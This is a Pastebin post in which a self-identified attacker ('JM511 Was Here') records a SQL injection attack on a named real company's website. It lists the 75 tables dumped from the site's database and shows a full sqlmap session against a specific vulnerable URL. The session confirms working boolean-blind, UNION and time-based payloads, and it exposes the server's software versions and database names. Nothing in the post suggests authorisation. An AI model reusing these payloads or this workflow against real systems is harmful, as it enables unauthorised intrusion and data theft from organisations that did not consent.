Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- JM511 Was Here , www.twitter.com/JM511 , Facebook.com/xJM511
- I'm Tired :_)
- -------------
- Database: sep2012danw1
- [75 tables]
- +-----------------------------+
- | contact |
- | country |
- | customer |
- | danway_aboutus |
- | danway_admin |
- | danway_banner |
- | danway_bg |
- | danway_brochures |
- | danway_business_dept |
- | danway_career |
- | danway_dept |
- | danway_details |
- | danway_education |
- | danway_exp |
- | danway_feedback |
- | danway_job_skill |
- | danway_location |
- | danway_mail_menu |
- | danway_menu |
- | danway_news |
- | danway_news_image |
- | danway_product |
- | danway_quality_desc |
- | danway_quality_image |
- | danway_quality_title |
- | danway_sitemap |
- | danway_skill |
- | danway_unit |
- | danway_unit_menu |
- | danway_unit_submenu |
- | danway_user_career |
- | danway_user_skill |
- | member |
- | months |
- | mos_banner |
- | mos_bannerclient |
- | mos_bannerfinish |
- | mos_categories |
- | mos_components |
- | mos_contact_details |
- | mos_content |
- | mos_content_frontpage |
- | mos_content_rating |
- | mos_core_acl_aro |
- | mos_core_acl_aro_groups |
- | mos_core_acl_aro_sections |
- | mos_core_acl_groups_aro_map |
- | mos_core_log_items |
- | mos_core_log_searches |
- | mos_groups |
- | mos_mambots |
- | mos_menu |
- | mos_messages |
- | mos_messages_cfg |
- | mos_modules |
- | mos_modules_menu |
- | mos_newsfeeds |
- | mos_poll_data |
- | mos_poll_date |
- | mos_poll_menu |
- | mos_polls |
- | mos_sections |
- | mos_session |
- | mos_stats_agents |
- | mos_template_positions |
- | mos_templates_menu |
- | mos_users |
- | mos_usertypes |
- | mos_weblinks |
- | mos_wrapper |
- | mstatus |
- | nation |
- | religion |
- | title |
- | uae_city |
- +-----------------------------+
- jm511com@jm511com:/opt/backbox/sqlmap$ ./sqlmap.py -u http://www.danway.ae/industrial-retail-systems.php?ID=26 --dbs
- sqlmap/1.0-dev-7ba9e75 - automatic SQL injection and database takeover tool
- http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 21:36:00
- [21:36:01] [INFO] testing connection to the target URL
- [21:36:02] [INFO] testing if the target URL is stable. This can take a couple of seconds
- [21:36:03] [INFO] target URL is stable
- [21:36:03] [INFO] testing if GET parameter 'ID' is dynamic
- [21:36:04] [INFO] confirming that GET parameter 'ID' is dynamic
- [21:36:05] [INFO] GET parameter 'ID' is dynamic
- [21:36:05] [WARNING] reflective value(s) found and filtering out
- [21:36:06] [INFO] heuristic (basic) test shows that GET parameter 'ID' might be injectable
- [21:36:06] [INFO] testing for SQL injection on GET parameter 'ID'
- [21:36:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [21:36:09] [INFO] GET parameter 'ID' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
- [21:36:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [21:36:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
- [21:36:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
- [21:36:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
- [21:36:17] [INFO] testing 'MySQL inline queries'
- [21:36:17] [INFO] testing 'PostgreSQL inline queries'
- [21:36:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
- [21:36:19] [INFO] testing 'Oracle inline queries'
- [21:36:19] [INFO] testing 'SQLite inline queries'
- [21:36:20] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [21:36:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
- [21:36:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
- [21:36:22] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [21:37:22] [INFO] GET parameter 'ID' is 'MySQL > 5.0.11 AND time-based blind' injectable
- [21:37:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
- [21:37:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
- [21:37:23] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
- [21:37:27] [INFO] target URL appears to have 1 column in query
- [21:37:28] [INFO] GET parameter 'ID' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
- GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
- sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
- ---
- Place: GET
- Parameter: ID
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: ID=26 AND 3941=3941
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 column
- Payload: ID=-8755 UNION ALL SELECT CONCAT(0x3a63646a3a,0x414d614272424c594f63,0x3a7774623a)#
- Type: AND/OR time-based blind
- Title: MySQL > 5.0.11 AND time-based blind
- Payload: ID=26 AND SLEEP(5)
- ---
- [21:44:46] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
- web application technology: Apache 2.2.22, PHP 5.3.10
- back-end DBMS: MySQL 5.0.11
- [21:44:46] [INFO] fetching database names
- [21:44:52] [INFO] the SQL query used returns 2 entries
- [21:44:53] [INFO] retrieved: "information_schema"
- [21:44:53] [INFO] retrieved: "sep2012danw1"
- available databases [2]:
- [*] information_schema
- [*] sep2012danw1
Add Comment
Please, Sign In to add comment